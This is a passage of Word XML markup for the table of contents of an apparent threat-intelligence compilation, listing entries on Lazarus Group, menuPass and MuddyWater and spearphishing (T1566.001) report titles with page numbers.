            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7A131382" w14:textId="092A0649" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480880" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.13.1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_Toc153480880 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48E04D13" w14:textId="328CD6DF" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480881" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.13.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480881 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>118</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5FF9ACA4" w14:textId="37E4CBE2" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480882" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.14</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Lazarus Group</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480882 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0860E826" w14:textId="3CD1870E" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480883" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.14.1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_Toc153480883 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>124</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08B6A1BF" w14:textId="615371C0" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480884" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.14.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480884 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>126</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6167C8BE" w14:textId="1C39F563" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480885" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.14.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - Hidden Cobra Targets Turkish Financial Sector With New Bankshot Implant (2)</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480885 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>133</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="658D0F3E" w14:textId="5889B824" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480886" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.15</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>menuPass</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480886 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>136</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F8E9EC7" w14:textId="101CCF01" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480887" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.15.1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_Toc153480887 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>136</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4D6E2FA7" w14:textId="5CA54EB0" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480888" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.15.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>APT10: sophisticated multi-layered loader Ecipekac discovered in A41APT campaign</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480888 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>137</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17270126" w14:textId="387F3013" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480889" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.16</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>MuddyWater</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480889 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E63BC5C" w14:textId="5A1825C3" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480890" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.16.1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_Toc153480890 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>141</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="633E000B" w14:textId="3350D878" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480891" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.16.2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480891 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>142</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C94920B" w14:textId="3BC8D8D3" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC4"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1760"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc153480892" w:history="1">
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.4.16.3</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:noProof/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3" w:rsidRPr="00C97D0A">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>T1566.001 - Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign 2</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc153480892 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>148</w:t>
            </w:r>
            <w:r w:rsidR="00BC4FB3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AB386FD" w14:textId="64E108BC" w:rsidR="00BC4FB3" w:rsidRDefault="00691E0D">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1320"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10456"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="en-GB"/>
            </w:rPr>
          </w:pPr>
